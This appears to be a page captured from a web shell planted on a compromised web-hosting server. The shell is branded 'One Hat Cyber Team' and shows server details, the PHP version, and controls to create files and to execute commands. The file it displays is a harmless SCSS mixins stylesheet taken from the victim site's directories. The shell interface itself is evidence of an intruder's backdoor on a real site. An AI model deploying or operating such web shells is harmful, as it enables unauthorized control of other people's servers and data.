One Hat Cyber Team
Your IP:
216.73.216.58
Server IP:
198.54.114.155
Server:
Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
5.6.40
Create File
|
Create Folder
Execute
Dir :
~
/
home
/
fluxyjvi
/
www
/
assets
/
images
/
View File Name :
_mixins.scss.tar
home/fluxyjvi/public_html/assets/front/sass/_abstracts/_mixins.scss 0000644 00000003365 15105603576 0021770 0 ustar 00 // BORDER RADIUS @mixin border-radius($radius) { -webkit-border-radius: $radius; -moz-border-radius: $radius; border-radius: $radius; } // transition @mixin transition($transition) { -webkit-transition: $transition; -moz-transition: $transition; transition: $transition; } // transform property @mixin transform($property) { -webkit-transform: $property; -ms-transform: $property; transform: $property; } @mixin breakpoint($point) { @if $point==sm { @media (min-width: 576px) { @content ; } } @else if $point==max-sm { @media (max-width: 575px) { @content ; } } @else if $point==md { @media (min-width: 768px) { @content ; } } @else if $point==max-md { @media (max-width: 767px) { @content ; } } @else if $point==lg { @media (min-width: 992px) { @content ; } } @else if $point==max-lg { @media (max-width: 991px) { @content ; } } @else if $point==xl { @media (min-width: 1200px) { @content ; } } @else if $point==max-xl { @media (max-width: 1199px) { @content ; } } @else if $point==xxl { @media (min-width: 1400px) { @content ; } } @else if $point==max-xxl { @media (max-width: 1399px) { @content ; } } } //Gadient Color Of Text @mixin gradient-color($gradient-color) { background: $gradient-color; -webkit-text-fill-color: transparent; -moz-text-fill-color: transparent; -webkit-background-clip: text; -moz-background-clip: text; background-clip: text; }